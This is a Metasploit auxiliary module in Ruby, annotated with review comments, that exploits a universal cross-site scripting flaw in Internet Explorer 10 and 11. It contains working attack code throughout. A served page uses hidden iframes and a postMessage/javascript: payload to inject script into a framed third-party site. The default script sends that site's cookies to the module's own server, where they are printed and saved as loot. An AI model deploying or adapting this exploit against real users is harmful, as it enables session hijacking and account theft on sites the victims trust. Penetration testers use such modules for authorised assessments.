##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Auxiliary module that runs the HttpServer mixin's web server and serves a page built
# around the IE 10/11 UXSS described in 'Description'. All server-side behaviour lives in
# #on_request_uri; the remaining methods build the URLs and markup that handler returns.
class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpServer

  # Module metadata plus the two module-specific options:
  #   TARGET_URI (required) - page framed by the served HTML; #setup requires it to start with "http".
  #   CUSTOMJS   (optional) - script used verbatim by #js instead of the default one.
  def initialize(info={})
    super(update_info(info,
      'Name' => "Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
      'Description' => %q{
        This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
        Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
        have X-Frame-Options or it will fail). You can also have your own custom JavaScript
        by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
        you are behind NAT.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'David Leo', # Original discovery
          'filedescriptor', # PoC
          'joev', # He figured it out really
          'sinn3r' # MSF
        ],
      'References' =>
        [
          [ 'OSVDB', '117876' ],
          [ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
          [ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
        ],
      'Platform' => 'win',
      'DisclosureDate' => "Feb 2 2015"
    ))

    register_options(
      [
        OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
        OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
      ], self.class)
  end

  # Validates TARGET_URI before the server is started, then defers to the mixin's setup.
  # Only the scheme prefix is checked, case-insensitively; nothing else about the URL is.
  # NOTE(review): /^http/i is line-anchored, so a multi-line value whose *later* line starts
  # with "http" also passes; \A would anchor the whole string.
  #
  # @raise [Msf::OptionValidateError] when TARGET_URI does not start with "http"
  def setup
    if target_uri !~ /^http/i
      raise Msf::OptionValidateError.new(['TARGET_URI'])
    end

    super
  end

  # Raw TARGET_URI option value, returned without any normalisation.
  def target_uri
    datastore['TARGET_URI']
  end

  # Memoised #html, so the markup (and the base64 of #js embedded in it) is built once per
  # module instance and every client receives the same body.
  def get_html
    @html ||= html
  end

  # Memoised random path for the cookie beacon: five random letters plus ".php". The same
  # value is used in the #js URL, the #extract_cookie pattern and the #on_request_uri
  # matcher, so all three agree for the lifetime of this instance.
  def ninja_cookie_stealer_name
    @ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
  end

  # Builds the absolute base URL of this module's server as the client should reach it:
  #   scheme - "https://" when the SSL option is set, otherwise "http://"
  #   host   - URIHOST when set; else the local address that routes to cli.peerhost;
  #            else srvhost_addr. IPv6 literals are bracketed.
  #   port   - ":URIPORT" when URIPORT is not 0; omitted when SRVPORT is the scheme's
  #            default (443 with SSL, 80 without); otherwise ":SRVPORT"
  #   path   - get_resource (the resource path the mixin serves this module on)
  # NOTE(review): if URIPORT were nil rather than 0 the first port branch would produce a
  # bare ':' -- presumably the mixin registers URIPORT with a default of 0; confirm.
  #
  # @param cli [Object] connected client used to pick a source address (defaults to self.cli)
  # @return [String] e.g. "http://host:port/resource"
  def get_uri(cli=self.cli)
    ssl = datastore["SSL"]
    proto = (ssl ? "https://" : "http://")
    if datastore['URIHOST']
      host = datastore['URIHOST']
    elsif (cli and cli.peerhost)
      host = Rex::Socket.source_address(cli.peerhost)
    else
      host = srvhost_addr
    end

    if Rex::Socket.is_ipv6?(host)
      host = "[#{host}]"
    end

    if datastore['URIPORT'] != 0
      port = ':' + datastore['URIPORT'].to_s
    elsif (ssl and datastore["SRVPORT"] == 443)
      port = ''
    elsif (!ssl and datastore["SRVPORT"] == 80)
      port = ''
    else
      port = ":" + datastore["SRVPORT"].to_s
    end

    uri = proto + host + port + get_resource

    uri
  end

  # Memoised #get_uri computed with the default client argument.
  def server_uri
    @server_uri ||= get_uri
  end

  # Script delivered into the TARGET_URI frame: CUSTOMJS verbatim when set, otherwise an
  # <img> whose src sends document.cookie to this server as the URL-encoded `data` query
  # parameter of #ninja_cookie_stealer_name -- the exact shape #extract_cookie parses.
  # NOTE(review): `||` only falls through on nil/false, so an empty-string CUSTOMJS (if the
  # datastore can yield one) is used as-is instead of the default.
  def js
    datastore['CUSTOMJS'] || %Q|var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);|
  end

  # Response body for any request #on_request_uri does not otherwise handle. It contains two
  # hidden iframes -- top[0] points at this server's redirect.php (which redirects to
  # TARGET_URI) and top[1] at TARGET_URI directly -- and a script that (a) installs an
  # onmessage handler forwarding the base64-decoded #js to top[1] via postMessage, and
  # (b) evaluates in top[0] a synchronous XHR to sleep.php (held 3 s by the server) followed
  # by assigning a javascript: URL that carries `payload`. Everything between %Q| and the
  # closing | is the literal body: the backslash runs are escaped once for the %Q literal and
  # once more for the JavaScript string literal they sit in, so do not "simplify" them.
  def html
    %Q|
    <iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
    <iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
    <script>
    window.onmessage = function(e){ top[1].postMessage(atob("#{Rex::Text.encode_base64(js)}"),"*"); };
    var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\\\"\\\\",\\\\"*\\\\")';
    top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
    </script>
    |
  end

  # Auxiliary entry point; `exploit` is supplied by the HttpServer mixin and presumably
  # starts the server for this module (confirm against the mixin).
  def run
    exploit
  end

  # Extracts the `data` query value from a request URI for the cookie path: the first
  # capture of `<ninja name>?data=(.+)`, or "" when the pattern is absent (nil.to_s),
  # then URI-decoded.
  #
  # @param uri [#to_s] request URI
  # @return [String] decoded value, possibly empty
  def extract_cookie(uri)
    Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)
  end

  # Request dispatcher. The matchers are unanchored regexes tested in order, so a URI that
  # merely contains "redirect.php" takes the first branch regardless of the rest of the path.
  #   redirect.php    - redirect the client to TARGET_URI (src of the first iframe in #html)
  #   sleep.php       - block 3 s, then reply with an empty body (the sync XHR in #html)
  #   <ninja>.php     - cookie beacon: decode the value, print it, record it as an
  #                     'ie.cookie' note and store it as loot keyed by cli.peerhost
  #   anything else   - serve #get_html
  def on_request_uri(cli, request)
    case request.uri
    when /redirect\.php/
      print_status("Sending redirect")
      send_redirect(cli, "#{datastore['TARGET_URI']}")
    when /sleep\.php/
      sleep(3)
      send_response(cli, '')
    when /#{ninja_cookie_stealer_name}/
      data = extract_cookie(request.uri)
      if data.blank?
        # The beacon fired but carried no cookie value (e.g. the framed page set none).
        print_status("The XSS worked, but no cookie")
      else
        print_status("Got cookie")
        print_line(data)
        report_note(
          :host => cli.peerhost,
          :type => 'ie.cookie',
          :data => data
        )
        path = store_loot('ie_uxss_cookie', "text/plain", cli.peerhost, data, "#{cli.peerhost}_ie_cookie.txt", "IE Cookie")
        vprint_good("Cookie stored as: #{path}")
      end
    else
      print_status("Sending HTML")
      send_response(cli, get_html)
    end
  end

end